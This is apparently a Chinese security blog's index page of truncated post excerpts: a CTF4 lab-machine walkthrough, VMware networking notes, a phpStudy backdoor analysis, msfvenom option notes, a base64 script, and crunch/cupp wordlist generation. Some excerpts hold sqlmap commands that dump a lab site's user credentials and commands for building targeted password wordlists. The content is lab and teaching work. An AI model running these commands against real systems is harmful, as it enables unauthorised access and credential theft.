2020-2-25 myluzh
SECURE
0x01初步探测
CTF4靶机导入虚拟机后,直接使用netdiscover命令扫描,找到靶机。
nmap命令扫描目标靶机端口,看看有哪些端口开放 可以看到80http 22ssh 25smtp端口开着
0x02查找漏洞
直接访问http地址,发现好像能sql注入
0x03 sql注入
sqlmap跑下数据库(其实没什么必要)
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --dbs
跑下数据表
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --tables
发现有个user表,直接跑user表字段
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --columns -T "user"
直接爆用户跟密码
#sqlmap -u "http://19...
阅读全文>>
标签: 渗透 靶机 ctf
评论(0)
(2545)
2020-2-25 myluzh
VMware
VMnet0:用于桥接模式下的虚拟交换机
VMnet1:用于仅主机模式下的虚拟交换机
VMnet8:用于NAT模式下的虚拟交换机
对应地,在Windows主机上对应虚拟了VMware Network Adapter VMnet1和VMware Network Adapter VMnet8两块虚拟网卡,至于为什么没有VMnot0的虚拟网卡,且看下文。
可见物理机其实有3个IP地址:192.168.1.107,192.168.80.1,192.168.22.1。通过这3个ip地址都可以访问到主机。
一、桥接模式
桥接模式就是将主机网卡与虚拟的网卡利用虚拟网桥进行通信。类似于把物理主机虚拟为一个交换机,所有桥接设置的虚拟机连接到这个交换机的一个接口上,物理主机也同样插在这个交换机当中,所以所有桥接下的网卡与网卡都是交换模式的,相互可以访问而不干扰。在桥接模式下,虚拟机IP地址需要与主机在同一网段,如果需要联网,则网关与DNS需要与主机网卡一致。
所以,桥接模式下的所有虚拟机都是和主机是在同一网段的...
阅读全文>>
标签: vmware 虚拟机 网络
评论(0)
(1889)
2020-2-23 myluzh
PHP
前言:
参考杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果提到,犯罪嫌疑人马某供述,其于2016年编写了后门,使用黑客手段非法侵入了软件官网,篡改了软件安装包内容。该“后门”无法被杀毒软件扫描删除,并且藏匿于软件某功能性代码中,极难被发现。
影响版本:
通过分析,后门代码存在phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 php_xmlrpc.dll模块中
phpStudy2016后门文件路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018后门文件路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
后门分析:
使用ida查看...
阅读全文>>
标签: 渗透 漏洞 phpstudy 后门 复现
评论(0)
(2346)
2020-2-23 myluzh
NOTE
参数说明:
-p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled < length> 为payload预先指定一个NOP滑动长度
-f, --format < format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch < architecture> 指定payload的目标架构
–platform < platform> 指定payload的目标平台
-s, --space < length> 设定有效攻击荷载的最大长度
-b, --bad-chars < list>...
阅读全文>>
标签: kali msfvenom linux
评论(0)
(5794)
2020-2-23 myluzh
Python
# coding:utf-8
s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
#s = "vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/"
def My_base64_encode(inputs):
# 将字符串转化为2进制
bin_str = []
for i in inputs:
x = str(bin(ord(i))).replace('0b', '')
bin_str.append('{:0>8}'.format(x))
#print(bin_str)
# 输出的字符串
outputs = ""
# 不够三倍数,需补齐的次数
nums = 0
while bin_str:
#每次取三个字符的二进制
temp_list = bin_str[:3]
if(len(temp_list) != 3):
nums = 3 - len(temp_list)
...
阅读全文>>
标签: python 加密 base64 解密 码表
评论(0)
(5607)
2020-2-22 myluzh
NOTE
0x01 Crunch篇
基本用法 #crunch 最小长度 最大长度 由哪些数组成
例如 ---- 生成一个长度最小3位,最大3位的密码,且都由1234567890中的4个数字组成 (需要生成空格则后面加空格即可)
#crunch 3 3 123456789
保存字典 ---- 把生成的字典保存在Desktop上的pass.txt中
#crunch 3 3 123456789 >>/root/Desktop/pass.txt
生成个人信息词典 --- 包括 姓名 生日 年龄等信息(前面最小最大长度必须要输入,不会对结果产生影响)
#crunch 3 3 -p zhangsan 0815 18
生成2020开头纯6位数字 --- (%代表所有的数字,@代表所有的小写字母,逗号代表所有大写字母)
#crunch 6 6 -t 2020%%
0x02 Cupp篇
Cupp是一个非常强大的工具,专门为一个人创建一个词汇表。CUPP是跨平台的,用Python编写。CUPP向您询问有关目标姓名等问题,然...
阅读全文>>
标签: kali linux crunch 字典 cupp cewl
评论(0)
(5538)